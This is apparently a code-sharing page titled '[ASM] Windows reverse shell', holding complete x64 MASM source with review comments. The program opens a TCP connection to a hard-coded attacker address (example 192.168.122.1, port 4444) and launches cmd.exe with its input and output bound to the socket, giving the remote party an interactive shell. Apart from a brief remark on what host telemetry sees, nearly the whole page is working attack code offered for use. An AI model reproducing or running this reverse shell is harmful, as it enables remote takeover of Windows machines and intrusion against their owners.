
[ASM] Windows reverse shell

Code

Remplacer l'IP et le port au format Little Endian.

extrn ExitProcess :PROC

extrn WSAStartup :PROC
extrn WSASocketA :PROC
extrn WSAConnect :PROC
extrn CreateProcessA :PROC

; Define the missing length constants used by the _wsadata layout below.
; They size the two string members of the Winsock WSADATA structure
; (the SDK declares the arrays as LEN + 1 bytes, see _wsadata).
WSADESCRIPTION_LEN equ 256
WSASYS_STATUS_LEN equ 128

; IPv4 socket address, 16 bytes: 2 + 2 + 4 + 8-byte zero pad.
; sin_port and sin_addr are stored as raw bytes, so the values placed
; in them must already be in network byte order (see the ip/port
; definitions in .data).  SIZEOF sockaddr_in is passed to WSAConnect.
sockaddr_in STRUC
    sin_family WORD ?
    sin_port WORD ?
    sin_addr DWORD ?
    sin_zero BYTE 8 DUP (?)
sockaddr_in ENDS

; Output buffer for WSAStartup (Winsock WSADATA).  Only its address is
; passed; nothing in this file reads the fields back afterwards.
; NOTE(review): the pointer member is spelled "IpVendorInfo" (capital I)
; where the SDK uses "lpVendorInfo"; harmless, the name is local.
_wsadata STRUC
    wVersion WORD ?
    wHighVersion WORD ?
    szDescription BYTE (WSADESCRIPTION_LEN + 1) DUP (?)
    szSystemStatus BYTE (WSASYS_STATUS_LEN + 1) DUP (?)
    iMaxSockets WORD ?
    iMaxUdpDg WORD ?
    IpVendorInfo QWORD ?
_wsadata ENDS

; x64 STARTUPINFOA layout.  The two explicit align_* pads reproduce the
; compiler's natural alignment of the 8-byte members, which is why the
; member sizes add up to 104 bytes (the value Start stores in cb).
; Only cb, dwFlags and the three hStd* handles are written in this file;
; "Ip*" members are the SDK's "lp*" pointers with an I typo (names are
; local, so this is cosmetic).
_startupinfoa STRUC
    cb DWORD ?
    align_1 BYTE 4 dup (?)
    IpReserved QWORD ?
    IpDesktop QWORD ?
    IpTitle QWORD ?
    dwX DWORD ?
    dwY DWORD ?
    dwXSize DWORD ?
    dwYSize DWORD ?
    dwXCountChars DWORD ?
    dwYCountChars DWORD ?
    dwFillAttribute DWORD ?
    dwFlags DWORD ?
    wShowWindow WORD ?
    cbReserved2 WORD ?
    align_2 BYTE 4 dup (?)
    lpReserved2 		QWORD ?
    hStdInput 		QWORD ?
    hStdOutput 		QWORD ?
    hStdError 		QWORD ?
; Closed with an upper-case spelling of the STRUC name above; MASM treats
; symbols case-insensitively by default (unless OPTION CASEMAP:NONE is set).
_STARTUPINFOA ENDS

; Output structure filled by CreateProcessA (x64 PROCESS_INFORMATION,
; 24 bytes).  The handles it receives are never closed in this file.
_PROCESS_INFORMATION STRUCT
    hProcess 	QWORD ?
    hThread 	QWORD ?
    dwProcessId 	DWORD ?
    dwThreadId 	DWORD ?
_PROCESS_INFORMATION ENDS


.data

    ; WSAStartup output buffer (never read back)
    WSAData _wsadata <>

    ; Socket handle returned by WSASocketA; reused as the child's std handles
    sd DQ ?

    ; CreateProcessA in/out structures
    SUInfo _STARTUPINFOA <>
    PrcInfo _PROCESS_INFORMATION <>

    ;caption DB "Caption", 0
    ;Key DB 6h
    ;user32_lib DB "User32.dll", 0

    ; Peer address, pre-swapped so the raw bytes are already in network
    ; byte order when copied into sa (Start copies them without conversion):
    ;   17AA8C0h -> bytes C0 A8 7A 01 = 192.168.122.1 (example value on the page)
    ;   5C11h    -> bytes 11 5C       = TCP port 4444  (example value on the page)
    sa sockaddr_in <>
    ip DD 17AA8C0h
    port DW 5C11h

    ; Command line handed to CreateProcessA (lpApplicationName is NULL)
    shell_str DB "cmd.exe", 0

.code
;-----------------------------------------------------------------------
; Start
; ABI:   Microsoft x64 — args in rcx, rdx, r8, r9; 5th and later args in
;        stack slots starting at [rsp+20h], above the 32-byte shadow space.
; Flow:  WSAStartup -> WSASocketA -> WSAConnect -> CreateProcessA
; What host telemetry observes: an outbound TCP connection to the address
; held in .data, followed by a cmd.exe child created with bInheritHandles=1
; and STARTF_USESTDHANDLES whose stdin/stdout/stderr are the socket
; handle.  A child process whose standard handles are a socket is the
; signal defenders key on for this pattern.  ExitProcess is imported
; but not referenced inside this procedure.
;-----------------------------------------------------------------------
Start PROC

; Fill in the sockaddr_in: family AF_INET, port/address copied verbatim
; (they are stored pre-swapped in .data, see the ip/port definitions)
    MOV sa.sin_family, 2                ; AF_INET
    MOV ax, port
    MOV sa.sin_port, ax
    MOV eax, [ip]
    MOV sa.sin_addr, eax

; WSAStartup(wVersionRequested = 2, &WSAData)
    sub rsp, 28h                        ; shadow space (+8 keeps rsp 16-aligned at CALL)

    MOV rcx, 2h                         ; wVersionRequested: major 2, minor 0
    LEA rdx, [WSAData]                  ; lpWSAData
    CALL WSAStartup

; WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0)
    sub rsp, 40h                        ; shadow space + two stack args

    MOV rcx, 2                          ; af       = AF_INET
    MOV rdx, 1                          ; type     = SOCK_STREAM
    MOV r8, 6                           ; protocol = IPPROTO_TCP
    XOR r9, r9                          ; lpProtocolInfo = NULL
    MOV qword ptr [rsp+20h], 0          ; g       = 0
    MOV qword ptr [rsp+28h], 0          ; dwFlags = 0
    CALL WSASocketA
    MOV sd, rax                         ; keep the socket handle
    ADD rsp, 40

; WSAConnect(sd, &sa, sizeof sa, NULL, NULL, NULL, NULL)
    sub rsp, 28h

    MOV rcx, sd                         ; s
    LEA rdx, sa                         ; name
    MOV r8, SIZEOF sockaddr_in          ; namelen (16)
    XOR r9, r9                          ; lpCallerData = NULL
    SUB rsp, 56                         ; shadow space + three stack args
    MOV qword ptr [rsp+32], 0           ; lpCalleeData = NULL
    MOV qword ptr [rsp+40], 0           ; lpSQOS       = NULL
    MOV qword ptr [rsp+48], 0           ; lpGQOS       = NULL
    CALL WSAConnect
    ADD rsp, 56

; CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &SUInfo, &PrcInfo)
    sub rsp, 50h                        ; shadow space + six stack args

    ; Bind the child's standard handles to the connected socket; this is
    ; the behaviour that makes the spawned process observable as unusual.
    MOV rax, sd
    MOV [SUInfo.hStdInput], rax
    MOV [SUInfo.hStdOutput], rax
    MOV [SUInfo.hStdError], rax
    MOV [SUInfo.cb], SIZEOF _STARTUPINFOA
    MOV [SUInfo.dwFlags], 100h          ; STARTF_USESTDHANDLES

    XOR rcx, rcx                        ; lpApplicationName  = NULL
    LEA rdx, shell_str                  ; lpCommandLine      = "cmd.exe"
    XOR r8, r8                          ; lpProcessAttributes = NULL
    XOR r9, r9                          ; lpThreadAttributes  = NULL

    MOV qword ptr [rsp+20h], 1          ; bInheritHandles    = TRUE (required for the hStd* handles)
    MOV qword ptr [rsp+28h], 0          ; dwCreationFlags    = 0
    MOV qword ptr [rsp+30h], 0          ; lpEnvironment      = NULL
    MOV qword ptr [rsp+38h], 0          ; lpCurrentDirectory = NULL
    LEA rax, SUInfo
    MOV qword ptr [rsp+40h], rax        ; lpStartupInfo
    LEA rax, PrcInfo
    MOV qword ptr [rsp+48h], rax        ; lpProcessInformation
    CALL CreateProcessA
    ADD rsp, 50h

Start ENDP
End